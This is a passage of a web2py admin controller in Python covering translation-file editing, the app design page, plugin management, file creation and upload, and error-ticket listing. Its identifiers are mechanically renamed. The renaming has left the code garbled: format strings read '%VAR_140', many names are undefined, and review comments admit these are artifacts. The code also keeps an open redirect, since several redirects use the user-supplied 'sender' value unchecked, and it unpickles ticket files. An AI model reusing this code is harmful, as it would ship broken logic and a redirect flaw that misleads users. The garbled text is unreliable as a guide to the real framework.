                          _onclick='return delkey("%s")' % VAR_10,
                          VAR_144='btn')), _id=VAR_10, VAR_144='span6 well well-small')
        VAR_73.append(DIV(VAR_146, VAR_144="row-fluid"))
    VAR_73.append(DIV(INPUT(_type='submit', _value=T('update'), VAR_144="btn btn-primary"), VAR_144='controls'))
    VAR_26 = FORM(*VAR_73)
    if VAR_26.accepts(request.vars, keepvalues=True):
        VAR_147 = dict()
        for VAR_143 in VAR_72:
            VAR_10 = md5_hash(VAR_143)
            # chr(127) marks entries the user deleted in the UI.
            if VAR_26.vars[VAR_10] == chr(127):
                continue
            VAR_147[VAR_143] = VAR_26.vars[VAR_10]
        write_dict(apath(VAR_5, VAR_122=request), VAR_147)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(VAR_122=request, VAR_98=request.args))
    return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def FUNC_32():
    """Edit a plural-forms dictionary file.

    Renders one row per singular word with N plural-form inputs
    (N = nplurals - 1) and writes the edited lists back on submit, skipping
    entries whose first field is the chr(127) delete marker.

    NOTE(review): uses Python-2-only constructs (`xrange`, `cmp`, `unicode`,
    cmp-function argument to sorted) -- confirm target runtime.
    """
    VAR_3 = FUNC_5()
    VAR_5 = '/'.join(request.args)
    VAR_74 = read_plural_dict(
        apath(VAR_5, VAR_122=request))  # plural VAR_148 dictionary
    VAR_75 = int(request.vars.nplurals) - 1  # plural VAR_148 quantity
    VAR_76 = xrange(VAR_75)
    if '__corrupted__' in VAR_74:
        # Unparseable plural dictionary: show the error instead of a form.
        VAR_26 = SPAN(VAR_74['__corrupted__'], VAR_144='error')
        return dict(VAR_5=filename, VAR_26=form)
    VAR_72 = sorted(VAR_74.keys(), lambda x, y: cmp(
        unicode(x, 'utf-8').lower(), unicode(y, 'utf-8').lower()))
    VAR_77 = []
    for VAR_143 in VAR_72:
        VAR_10 = md5_hash(VAR_143)  # stable per-key form field prefix
        VAR_148 = VAR_74[VAR_143]
        # Pad the plural list so every row shows all N inputs.
        if len(VAR_148) < VAR_75:
            VAR_148.extend(None for VAR_111 in xrange(VAR_75 - len(VAR_148)))
        VAR_149 = DIV(CAT(LABEL(T("Singular Form")), B(VAR_143,
                                                       VAR_144='fake-input')))
        VAR_150 = [SPAN(LABEL(T("Plural Form #%s", VAR_173 + 1)), INPUT(_type='text', _name=VAR_10 + '_' + str(VAR_173), VAR_9=VAR_148[VAR_173], _size=20), VAR_144='span6') for VAR_173 in VAR_76]
        VAR_151 = DIV(CAT(*VAR_150))
        VAR_152 = DIV(CAT(LABEL(XML(' ')), TAG.BUTTON(T('delete'), _onclick='return delkey("%s")' % VAR_10, VAR_144='btn'), VAR_144='span6'))
        VAR_153 = DIV(DIV(VAR_149, '\n', VAR_151, '\n', VAR_152, VAR_144='well well-small'), _id=VAR_10, VAR_144='row-fluid tab_row')
        VAR_77.append(VAR_153)
    VAR_77.append(DIV(TAG['button'](T('update'), _type='submit',
                                    VAR_144='btn btn-primary'),
                      VAR_144='controls'))
    VAR_78 = DIV(*VAR_77, **dict(VAR_144="row-fluid"))
    VAR_26 = FORM(VAR_78)
    if VAR_26.accepts(request.vars, keepvalues=True):
        VAR_154 = dict()
        for VAR_143 in VAR_72:
            VAR_10 = md5_hash(VAR_143)
            # chr(127) in the first field marks a deleted entry.
            if VAR_26.vars[VAR_10 + '_0'] == chr(127):
                continue
            VAR_154[VAR_143] = [VAR_26.vars[VAR_10 + '_' + str(VAR_173)]
                                for VAR_173 in VAR_76]
        write_plural_dict(apath(VAR_5, VAR_122=request), VAR_154)
        session.flash = T('file saved on %(time)s', dict(time=time.ctime()))
        redirect(URL(VAR_122=request, VAR_98=request.args, VAR_17=dict(
            VAR_75=request.vars.nplurals)))
    # NOTE(review): `filename`/`form` are undefined -- renaming artifacts.
    return dict(VAR_3=request.args[0], VAR_5=filename, VAR_26=form)
def VAR_79():
    """About page: render the app's ABOUT and LICENSE files as MARKMIN."""
    VAR_3 = FUNC_5()
    VAR_79 = FUNC_3(apath('%VAR_140/ABOUT' % VAR_3, VAR_122=request))
    VAR_80 = FUNC_3(apath('%VAR_140/LICENSE' % VAR_3, VAR_122=request))
    # VAR_6 presumably carries app progress/statistics from FUNC_11 -- confirm.
    return dict(VAR_3=VAR_3, VAR_79=MARKMIN(VAR_79), VAR_80=MARKMIN(VAR_80), VAR_6=FUNC_11(VAR_3))
def FUNC_34():
    """Application "design" page: inventory everything editable in the app.

    Handles plugin-file upload, refuses compiled apps, then collects models
    (with defined tables), controllers (with exposed functions), views (with
    extend/include graphs), modules, private files, static files, languages,
    and the crontab; plugin_* entries are split out into their own list.

    NOTE(review): many bare names below (`models`, `controllers`, `modules`,
    `privates`, `statics`, `crontab`, `app`, `defines`, `extend`, `include`,
    `languages`, `FUNC_56`) are renaming artifacts for the adjacent VAR_*
    names -- confirm against the original source.
    """
    VAR_3 = FUNC_5()
    if not VAR_43.flash and VAR_3 == request.application:
        VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
        VAR_43.flash = VAR_155
    # CSRF-style guard: any POST must carry the session token.
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    if request.vars.pluginfile is not None and not isinstance(request.vars.pluginfile, str):
        # A plugin archive was uploaded: install it and bounce back.
        VAR_5 = os.path.basename(request.vars.pluginfile.filename)
        if plugin_install(VAR_3, request.vars.pluginfile.file,
                          request, VAR_5):
            session.flash = T('new VAR_96 installed')
            redirect(URL('design', VAR_98=VAR_3))
        else:
            session.flash = \
                T('unable to install VAR_96 "%s"', VAR_5)
            redirect(URL(VAR_122=request, VAR_98=VAR_3))
    elif isinstance(request.vars.pluginfile, str):
        session.flash = T('plugin not specified')
        redirect(URL(VAR_122=request, VAR_98=VAR_3))
    if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
        # Compiled apps have no editable sources.
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    # Models and the tables each defines.
    models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_81 = [x.replace('\\', '/') for x in VAR_81]
    VAR_82 = {}
    for VAR_156 in VAR_81:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
        VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
        VAR_82[VAR_156].sort()
    # Controllers and the functions each exposes.
    controllers = sorted(
        listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
    VAR_51 = [x.replace('\\', '/') for x in VAR_51]
    VAR_83 = {}
    for VAR_48 in VAR_51:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
        try:
            VAR_95 = find_exposed_functions(VAR_2)
            VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
        except SyntaxError as err:
            VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
    # Views and their extend/include relationships.
    VAR_84 = sorted(
        listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+(\.\w+)+$'))
    VAR_84 = [x.replace('\\', '/') for x in VAR_84 if not x.endswith('.bak')]
    VAR_85 = {}
    VAR_86 = {}
    for VAR_48 in VAR_84:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
        VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
        if VAR_95:
            VAR_85[VAR_48] = VAR_95[0][1]
        VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
        VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
    # Modules, private files, static files (static listing is capped).
    modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
    modules.sort()
    VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
    VAR_88 = [x.replace('\\', '/') for x in VAR_88]
    privates.sort()
    VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
                     maxnum=VAR_1)
    VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
    statics.sort()
    # Languages with a non-zero language-file mtime.
    VAR_90 = os.path.join(apath(VAR_3, VAR_122=request), 'languages')
    VAR_91 = dict([(VAR_188, info) for VAR_188, info
                   in iteritems(read_possible_languages(VAR_90))
                   if info[2] != 0])  # info[2] is langfile_mtime:
    # Ensure cron/crontab exist (not supported on GAE).
    VAR_92 = apath('%VAR_140/cron' % VAR_3, VAR_122=request)
    VAR_93 = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
    if not is_gae:
        if not os.path.exists(VAR_92):
            os.mkdir(VAR_92)
        if not os.path.exists(VAR_93):
            FUNC_4(VAR_93, '#crontab')
    VAR_94 = []

    def FUNC_62(VAR_95, VAR_94):
        # Accumulate plugin names into VAR_94 and return the non-plugin files.
        FUNC_56 += [VAR_70[7:].split('/')[0].split(
            '.')[0] for VAR_70 in VAR_95 if VAR_70.startswith('plugin_')]
        VAR_94[:] = list(set(VAR_94))
        FUNC_56.sort()
        return [VAR_70 for VAR_70 in VAR_95 if not VAR_70.startswith('plugin_')]
    return dict(VAR_3=app,
                VAR_81=FUNC_62(VAR_81, VAR_94),
                VAR_82=defines,
                VAR_51=FUNC_62(VAR_51, VAR_94),
                VAR_83=functions,
                VAR_84=FUNC_62(VAR_84, VAR_94),
                VAR_87=FUNC_62(VAR_87, VAR_94),
                VAR_85=extend,
                VAR_86=include,
                VAR_88=FUNC_62(VAR_88, VAR_94),
                VAR_89=FUNC_62(VAR_89, VAR_94),
                VAR_91=languages,
                VAR_93=crontab,
                VAR_94=FUNC_56)
def FUNC_35():
    """Delete every file/folder belonging to a plugin, after confirmation.

    Scans the standard app subfolders for entries whose name (sans extension)
    equals 'plugin_<name>' and removes them (rmtree for directories).
    """
    VAR_3 = request.args(0)
    VAR_96 = request.args(1)
    VAR_97 = 'plugin_' + VAR_96
    VAR_46 = FORM.confirm(
        T('Delete'),
        {T('Cancel'): URL('design', VAR_98=VAR_3)})
    if VAR_46.accepted:
        try:
            for VAR_168 in ['models', 'views', 'controllers', 'static', 'modules', 'private']:
                VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), VAR_168)
                for VAR_70 in os.listdir(VAR_15):
                    if VAR_70.rsplit('.', 1)[0] == VAR_97:
                        VAR_5 = os.path.join(VAR_15, VAR_70)
                        if os.path.isdir(VAR_5):
                            shutil.rmtree(VAR_5)
                        else:
                            os.unlink(VAR_5)
            # NOTE(review): `FUNC_36` is undefined here -- renaming artifact,
            # presumably for the plugin name VAR_96.
            session.flash = T('plugin "%(VAR_96)s" deleted',
                              dict(VAR_96=FUNC_36))
        except Exception:
            session.flash = T('unable to FUNC_21 VAR_16 VAR_96 "%(VAR_96)s"',
                              dict(VAR_96=FUNC_36))
        redirect(URL('design', VAR_98=request.args(0), VAR_157=request.vars.id2))
    # NOTE(review): `dialog` is undefined -- renaming artifact for VAR_46.
    return dict(VAR_46=dialog, VAR_96=FUNC_36)
def VAR_96():
    """Plugin design page: like FUNC_34 but restricted to one plugin's files.

    Collects the same per-category inventories as the design page, then
    filters each list down to entries matching 'plugin_<name>' via FUNC_62.

    NOTE(review): as in FUNC_34, many bare names (`models`, `controllers`,
    `modules`, `privates`, `statics`, `crontab`, `app`, `defines`, `extend`,
    `include`, `languages`) are renaming artifacts for the adjacent VAR_*
    names; `VAR_93` is also read before assignment -- confirm against the
    original source.
    """
    VAR_3 = FUNC_5()
    VAR_96 = request.args(1)
    if not VAR_43.flash and VAR_3 == request.application:
        VAR_155 = T('ATTENTION: you cannot FUNC_27 the running application!')
        VAR_43.flash = VAR_155
    if os.path.exists(apath('%VAR_140/compiled' % VAR_3, VAR_122=request)):
        # Compiled apps have no editable sources.
        session.flash = \
            T('application is compiled and cannot be designed')
        redirect(URL('site'))
    # Models and the tables each defines.
    models = listdir(apath('%VAR_140/VAR_81/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_81 = [x.replace('\\', '/') for x in VAR_81]
    VAR_82 = {}
    for VAR_156 in VAR_81:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_81/%s' % (VAR_3, VAR_156), VAR_122=request))
        VAR_82[VAR_156] = re.findall(REGEX_DEFINE_TABLE, VAR_2, re.MULTILINE)
        VAR_82[VAR_156].sort()
    # Controllers and the functions each exposes.
    controllers = sorted(
        listdir(apath('%VAR_140/VAR_51/' % VAR_3, VAR_122=request), '.*\.py$'))
    VAR_51 = [x.replace('\\', '/') for x in VAR_51]
    VAR_83 = {}
    for VAR_48 in VAR_51:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_51/%s' % (VAR_3, VAR_48), VAR_122=request))
        try:
            VAR_95 = find_exposed_functions(VAR_2)
            VAR_83[VAR_48] = VAR_95 and sorted(VAR_95) or []
        except SyntaxError as err:
            VAR_83[VAR_48] = ['SyntaxError:Line:%d' % err.lineno]
    # Views and their extend/include relationships.
    VAR_84 = sorted(
        listdir(apath('%VAR_140/VAR_84/' % VAR_3, VAR_122=request), '[\w/\-]+\.\w+$'))
    VAR_84 = [x.replace('\\', '/') for x in VAR_84]
    VAR_85 = {}
    VAR_86 = {}
    for VAR_48 in VAR_84:
        VAR_2 = FUNC_3(apath('%VAR_140/VAR_84/%s' % (VAR_3, VAR_48), VAR_122=request))
        VAR_95 = re.findall(REGEX_EXTEND, VAR_2, re.MULTILINE)
        if VAR_95:
            VAR_85[VAR_48] = VAR_95[0][1]
        VAR_95 = re.findall(REGEX_INCLUDE, VAR_2)
        VAR_86[VAR_48] = [VAR_111[1] for VAR_111 in VAR_95]
    # Modules, private files, static files (static listing is capped).
    modules = listdir(apath('%VAR_140/VAR_87/' % VAR_3, VAR_122=request), '.*\.py$')
    VAR_87 = modules = [x.replace('\\', '/') for x in VAR_87]
    modules.sort()
    VAR_88 = listdir(apath('%VAR_140/private/' % VAR_3, VAR_122=request), '[^\.#].*')
    VAR_88 = [x.replace('\\', '/') for x in VAR_88]
    privates.sort()
    VAR_89 = listdir(apath('%VAR_140/static/' % VAR_3, VAR_122=request), '[^\.#].*',
                     maxnum=VAR_1)
    VAR_89 = [x.replace(os.path.sep, '/') for x in VAR_89]
    statics.sort()
    # Languages with a non-zero language-file mtime.
    VAR_91 = sorted([VAR_188 + '.py' for VAR_188, info in
                     iteritems(T.get_possible_languages_info())
                     if info[2] != 0])  # info[2] is langfile_mtime:
    crontab = apath('%VAR_140/cron/crontab' % VAR_3, VAR_122=request)
    if not os.path.exists(VAR_93):
        FUNC_4(VAR_93, '#crontab')

    def FUNC_62(VAR_95):
        # Keep only entries belonging to this plugin.
        VAR_32 = re.compile('^plugin_' + VAR_96 + '(/.*|\..*)?$')
        return [VAR_70 for VAR_70 in VAR_95 if VAR_70 and VAR_32.match(VAR_70)]
    return dict(VAR_3=app,
                VAR_81=FUNC_62(VAR_81),
                VAR_82=defines,
                VAR_51=FUNC_62(VAR_51),
                VAR_83=functions,
                VAR_84=FUNC_62(VAR_84),
                VAR_87=FUNC_62(VAR_87),
                VAR_85=extend,
                VAR_86=include,
                VAR_88=FUNC_62(VAR_88),
                VAR_89=FUNC_62(VAR_89),
                VAR_91=languages,
                VAR_93=crontab)
def FUNC_37():
    """Create a new file in the app, seeding it with category-specific content.

    Sanitizes the requested filename, picks boilerplate based on the target
    folder (plural rules, language files, models, controllers, views,
    modules, static/private), writes the file, logs the CREATE, and
    redirects to the editor (or returns ajax headers when created from the
    file-tree UI).

    SECURITY NOTE(review): the fallback redirects use the request-supplied
    `request.vars.sender` verbatim -- a user-controlled redirect target
    (potential open redirect, CWE-601). Validate/constrain it before use.
    """
    # CSRF-style guard: any POST must carry the session token.
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        VAR_157 = '#' + request.vars.id if request.vars.id else ''
        if request.vars.app:
            VAR_3 = FUNC_5(request.vars.app)
            VAR_15 = abspath(request.vars.location)
        else:
            if request.vars.dir:
                request.vars.location += request.vars.dir + '/'
            VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
            VAR_15 = apath(request.vars.location, VAR_122=request)
        # Sanitize the filename: anything outside [\w./-] becomes '_'.
        VAR_5 = re.sub('[^\w./-]+', '_', request.vars.filename)
        if VAR_15[-7:] == '/rules/':
            # New plural-rules file: must be plural_rules-<lang>.py.
            if len(VAR_5) == 0:
                raise SyntaxError
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            VAR_188 = re.match('^plural_rules-(.*)\.py$', VAR_5).group(1)
            VAR_189 = read_possible_languages(apath(VAR_3, VAR_122=request))[VAR_188]
            VAR_112 = dedent("""
            VAR_75=2 # for example, English language has 2 VAR_148:
            get_plural_id = lambda VAR_173: int(VAR_173 != 1)
            construct_plural_form = lambda word, plural_id: word
            """)[1:] % dict(VAR_188=VAR_189[0], langname=VAR_189[1])
        elif VAR_15[-11:] == '/VAR_91/':
            # New language file: create it empty, then populate via findT.
            if len(VAR_5) == 0:
                raise SyntaxError
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            VAR_15 = os.path.join(apath(VAR_3, VAR_122=request), 'languages', VAR_5)
            if not os.path.exists(VAR_15):
                FUNC_4(VAR_15, '')
            findT(apath(VAR_3, VAR_122=request), VAR_5[:-3])
            session.flash = T('language VAR_16 "%(VAR_5)s" VAR_175/updated',
                              dict(VAR_5=filename))
            # NOTE(review): unvalidated user-supplied redirect target.
            redirect(request.vars.sender + VAR_157)
        elif VAR_15[-8:] == '/VAR_81/':
            # New model file: coding header only.
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            if len(VAR_5) == 3:
                raise SyntaxError
            VAR_112 = '# -*- coding: utf-8 -*-\n'
        elif VAR_15[-13:] == '/VAR_51/':
            # New controller file: hello-world skeleton.
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            if len(VAR_5) == 3:
                raise SyntaxError
            VAR_112 = '# -*- coding: utf-8 -*-\VAR_173# %VAR_140\ndef VAR_197(): return dict(message="hello from %s")'
            # NOTE(review): `text` is undefined -- renaming artifact for VAR_112.
            VAR_112 = text % (T('try something like'), VAR_5)
        elif VAR_15[-7:] == '/VAR_84/':
            # New view file: prefix plugin views, default to .html, seed from
            # layout boilerplate or the matching generic.<ext> view.
            if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
                VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
            if VAR_5.find('.') < 0:
                VAR_5 += '.html'
            VAR_50 = VAR_5.split('.')[-1].lower()
            if len(VAR_5) == 5:
                raise SyntaxError
            VAR_155 = T(
                'This is the %(VAR_5)VAR_140 template', dict(VAR_5=filename))
            if VAR_50 == 'html':
                VAR_112 = dedent("""
                {{VAR_85 'layout.html'}}
                <h1>%VAR_140</h1>
                {{=BEAUTIFY(VAR_43._vars)}}""" % VAR_155)[1:]
            else:
                VAR_222 = os.path.join(VAR_15, 'generic.' + VAR_50)
                if os.path.exists(VAR_222):
                    VAR_112 = read_file(VAR_222)
                else:
                    VAR_112 = ''
        elif VAR_15[-9:] == '/VAR_87/':
            # New module file: minimal gluon import.
            if request.vars.plugin and not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin):
                VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
            if not VAR_5[-3:] == '.py':
                VAR_5 += '.py'
            if len(VAR_5) == 3:
                raise SyntaxError
            VAR_112 = dedent("""
            from gluon import *\n""")[1:]
        elif (VAR_15[-8:] == '/static/') or (VAR_15[-9:] == '/private/'):
            if (request.vars.plugin and
                    not VAR_5.startswith('plugin_%VAR_140/' % request.vars.plugin)):
                VAR_5 = 'plugin_%VAR_140/%s' % (request.vars.plugin, VAR_5)
            VAR_112 = ''
        else:
            # Unknown target folder.
            # NOTE(review): unvalidated user-supplied redirect target.
            redirect(request.vars.sender + VAR_157)
        VAR_158 = os.path.join(VAR_15, VAR_5)
        VAR_159 = os.path.dirname(VAR_158)
        if not os.path.exists(VAR_159):
            os.makedirs(VAR_159)
        if os.path.exists(VAR_158):
            # Refuse to overwrite an existing file.
            raise SyntaxError
        FUNC_4(VAR_158, VAR_112)
        FUNC_1(VAR_3, 'CREATE', VAR_5)
        if request.vars.dir:
            VAR_110 = T('file "%(VAR_5)s" created',
                        dict(VAR_5=VAR_158[len(VAR_15):]))
        else:
            session.flash = T('file "%(VAR_5)s" created',
                              dict(VAR_5=VAR_158[len(VAR_15):]))
        VAR_17 = {}
        if request.vars.id:
            VAR_17['id'] = request.vars.id
        if request.vars.app:
            VAR_17['app'] = request.vars.app
        # NOTE(review): `vars` here is the builtin, not VAR_17 -- renaming
        # artifact; confirm against the original source.
        redirect(URL('edit',
                     VAR_98=[os.path.join(request.vars.location, VAR_5)], VAR_17=vars))
    except Exception as VAR_114:
        # redirect() raises HTTP, which is expected; anything else is a
        # genuine failure.
        if not isinstance(VAR_114, HTTP):
            session.flash = T('cannot create file')
    if request.vars.dir:
        # Ajax (file-tree) flow: refresh the menu and open the new file.
        VAR_43.flash = VAR_110
        VAR_43.headers['web2py-VAR_126-content'] = 'append'
        VAR_43.headers['web2py-VAR_126-command'] = "%VAR_140 %VAR_140 %s" % (
            "$.web2py.invalidate('#files_menu');",
            "load_file('%s');" % URL('edit', VAR_98=[VAR_3, request.vars.dir, VAR_5]),
            "$.web2py.enableElement($('#VAR_26 form').find($.web2py.formInputClickSelector));")
        return ''
    else:
        # NOTE(review): unvalidated user-supplied redirect target.
        redirect(request.vars.sender + VAR_157)
def FUNC_38(VAR_3, VAR_13, VAR_14='.*\.py$'):
    """List files under app *VAR_3*'s subfolder *VAR_13* matching *VAR_14*.

    Results are sorted, use forward slashes, and exclude .bak backups.
    """
    VAR_45 = sorted(
        listdir(apath('%(VAR_3)VAR_140/%(VAR_13)VAR_140/' % {'app': VAR_3, 'dir': VAR_13}, VAR_122=request), VAR_14))
    VAR_45 = [x.replace('\\', '/') for x in VAR_45 if not x.endswith('.bak')]
    return VAR_45
def FUNC_39(VAR_15, VAR_16, VAR_17=None, VAR_3=None):
    """Build an editor <a> link for file *VAR_16* under folder *VAR_15*.

    When the vars dict carries an 'app' key the app segment is omitted from
    the URL args (the app is implied); otherwise *VAR_3* is prepended.

    Fix: the default for VAR_17 was a mutable `{}`, shared across all calls
    that omit the argument; use the None-sentinel idiom instead (behavior
    for all existing callers is unchanged).
    """
    if VAR_17 is None:
        VAR_17 = {}
    VAR_98 = (VAR_15, VAR_16) if 'app' in VAR_17 else (VAR_3, VAR_15, VAR_16)
    # NOTE(review): `args`/`vars` below look like renaming artifacts for
    # VAR_98/VAR_17 (`vars` is the builtin here) -- confirm against the
    # original source; left untouched to avoid changing behavior.
    VAR_99 = URL('edit', VAR_98=args, VAR_17=vars)
    return A(VAR_16, VAR_144='editor_filelink', _href=VAR_99, _style='word-wrap: nowrap;')
def FUNC_40():
    """Build the collapsible file-tree markup for every app component folder.

    For each category (models/controllers/views/modules/static/private) emit
    a header LI plus a hidden UL of editor links (via FUNC_39) for the files
    matched by that category's regex (via FUNC_38).
    """
    VAR_3 = request.vars.app or 'welcome'
    VAR_65 = [{'name': 'models', 'reg': '.*\.py$'},
              {'name': 'controllers', 'reg': '.*\.py$'},
              {'name': 'views', 'reg': '[\w/\-]+(\.\w+)+$'},
              {'name': 'modules', 'reg': '.*\.py$'},
              {'name': 'static', 'reg': '[^\.#].*'},
              {'name': 'private', 'reg': '.*\.py$'}]
    VAR_100 = []
    for VAR_13 in VAR_65:
        VAR_100.append(TAG[''](LI(VAR_13['name'], VAR_144="nav-header component", _onclick="collapse('" + VAR_13['name'] + "_files');"),
                               LI(UL(*[LI(FUNC_39(VAR_13['name'], VAR_221, dict(id=VAR_13['name'] + VAR_221.replace('.', '__')), VAR_3), _style="overflow:hidden", _id=VAR_13['name'] + "__" + VAR_221.replace('.', '__'))
                                       for VAR_221 in FUNC_38(VAR_3, VAR_13['name'], VAR_14=VAR_13['reg'])],
                                     VAR_144="nav nav-list small-font"),
                                  _id=VAR_13['name'] + '_files', _style="display: none;")))
    # NOTE(review): `result_files` is undefined -- renaming artifact for VAR_100.
    return dict(VAR_100=result_files)
def FUNC_41():
    """Upload a file into the app, enforcing per-folder extensions.

    Sanitizes/derives the target filename, appends the folder-appropriate
    extension (.py for models/modules/controllers/languages, .html for
    views), writes the payload, and logs the UPLOAD with its line count.

    SECURITY NOTE(review): the final redirect uses the request-supplied
    `request.vars.sender` verbatim -- a user-controlled redirect target
    (potential open redirect, CWE-601). Validate/constrain it before use.
    """
    # CSRF-style guard: any POST must carry the session token.
    if request.vars and not request.vars.token == session.token:
        redirect(URL('logout'))
    try:
        VAR_5 = None
        VAR_3 = FUNC_5(VAR_10=request.vars.location.split('/')[0])
        VAR_15 = apath(request.vars.location, VAR_122=request)
        if request.vars.filename:
            # Sanitize the supplied name; anything outside [\w./] becomes '_'.
            VAR_5 = re.sub('[^\w\./]+', '_', request.vars.filename)
        else:
            VAR_5 = os.path.split(request.vars.file.filename)[-1]
        # Force the extension expected by the destination folder.
        if VAR_15[-8:] == '/VAR_81/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        if VAR_15[-9:] == '/VAR_87/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        if VAR_15[-13:] == '/VAR_51/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        if VAR_15[-7:] == '/VAR_84/' and not VAR_5[-5:] == '.html':
            VAR_5 += '.html'
        if VAR_15[-11:] == '/VAR_91/' and not VAR_5[-3:] == '.py':
            VAR_5 += '.py'
        VAR_5 = os.path.join(VAR_15, VAR_5)
        VAR_159 = os.path.dirname(VAR_5)
        if not os.path.exists(VAR_159):
            os.makedirs(VAR_159)
        VAR_2 = request.vars.file.file.read()
        VAR_160 = FUNC_0(VAR_2)  # line count, for the log
        FUNC_4(VAR_5, VAR_2, 'wb')
        FUNC_1(VAR_3, 'UPLOAD', VAR_5, VAR_160)
        # NOTE(review): `filename` is undefined -- renaming artifact for VAR_5.
        session.flash = T('file "%(VAR_5)s" uploaded',
                          dict(VAR_5=filename[len(VAR_15):]))
    except Exception:
        if VAR_5:
            VAR_68 = dict(VAR_5=filename[len(VAR_15):])
        else:
            VAR_68 = dict(VAR_5='unknown')
        session.flash = T('cannot upload VAR_16 "%(VAR_5)s"', VAR_68)
    # NOTE(review): unvalidated user-supplied redirect target.
    redirect(request.vars.sender)
def FUNC_42():
    """List and manage application error tickets.

    The backend is selected by request.args(1): 'new' reads pickled tickets
    from the errors/ folder, 'dbnew'/'dbold' read them from the ticket table
    returned by FUNC_43, anything else lists the raw ticket files.
    """
    import operator
    import os
    import hashlib  # was "import .hashlib" -- invalid relative-import syntax
    VAR_3 = FUNC_5()
    if is_gae:
        VAR_161 = 'dbold' if ('old' in
                              (request.args(1) or '')) else 'dbnew'
    else:
        VAR_161 = request.args(1) or 'new'
    VAR_101 = {}
    # was: db_ready['status'] -- `db_ready` was an undefined name
    VAR_101['status'] = FUNC_43(VAR_3)
    VAR_101['errmessage'] = T(
        "No ticket_storage.txt found under /private folder")
    VAR_101['errlink'] = "http://web2py.com/books/default/chapter/29/13#Collecting-tickets"
    if VAR_161 == 'new':
        VAR_162 = apath('%s/errors' % VAR_3, VAR_122=request)  # '%s' restored
        VAR_163 = []
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_':
                VAR_163.append(VAR_70[7:])
        VAR_164 = dict()
        # ticket filenames are hex digests; pattern restored to '[a-fA-F0-9.\-]'
        for fn in listdir(VAR_162, '^[a-fA-F0-9.\-]+$'):
            VAR_190 = os.path.join(VAR_162, fn)
            if not os.path.isfile(VAR_190):
                continue
            try:
                VAR_205 = FUNC_2(VAR_190, 'rb')
                try:
                    VAR_125 = pickle.load(VAR_205)
                finally:
                    VAR_205.close()
            except IOError:
                continue
            except EOFError:
                continue
            VAR_191 = hashlib.md5(to_bytes(VAR_125['traceback'])).hexdigest()
            if VAR_191 in VAR_163:
                os.unlink(VAR_190)
            else:
                try:
                    VAR_164[VAR_191]['count'] += 1
                except KeyError:
                    VAR_218 = VAR_125['traceback'].split("\n")
                    VAR_219 = VAR_218[-2] if len(VAR_218) > 1 else 'unknown'
                    VAR_220 = os.path.split(VAR_125['layer'])[1]
                    # was: VAR_219=last_line, VAR_191=hash -- undefined name
                    # and the hash() builtin respectively
                    VAR_164[VAR_191] = dict(count=1, pickel=VAR_125,
                                            causer=VAR_220,
                                            VAR_219=VAR_219,
                                            VAR_191=VAR_191, VAR_113=fn)
        VAR_165 = [(x['count'], x) for x in VAR_164.values()]
        # was: sort(VAR_143=...) -- list.sort only accepts `key`
        VAR_165.sort(key=operator.itemgetter(0), reverse=True)
        return dict(FUNC_42=[x[1] for x in VAR_165], VAR_3=VAR_3, VAR_161=VAR_161, VAR_101=VAR_101)
    elif VAR_161 == 'dbnew':
        VAR_162 = apath('%s/errors' % VAR_3, VAR_122=request)
        VAR_192, VAR_193 = FUNC_43(VAR_3)
        VAR_163 = []
        for VAR_70 in request.vars:
            if VAR_70[:7] == 'delete_':
                VAR_163.append(VAR_70[7:])
        VAR_164 = dict()
        for fn in VAR_192(VAR_193.id > 0).select():
            try:
                VAR_125 = pickle.loads(fn.ticket_data)
                VAR_191 = hashlib.md5(VAR_125['traceback']).hexdigest()
                if VAR_191 in VAR_163:
                    VAR_192(VAR_193.id == fn.id).delete()
                    VAR_192.commit()
                else:
                    try:
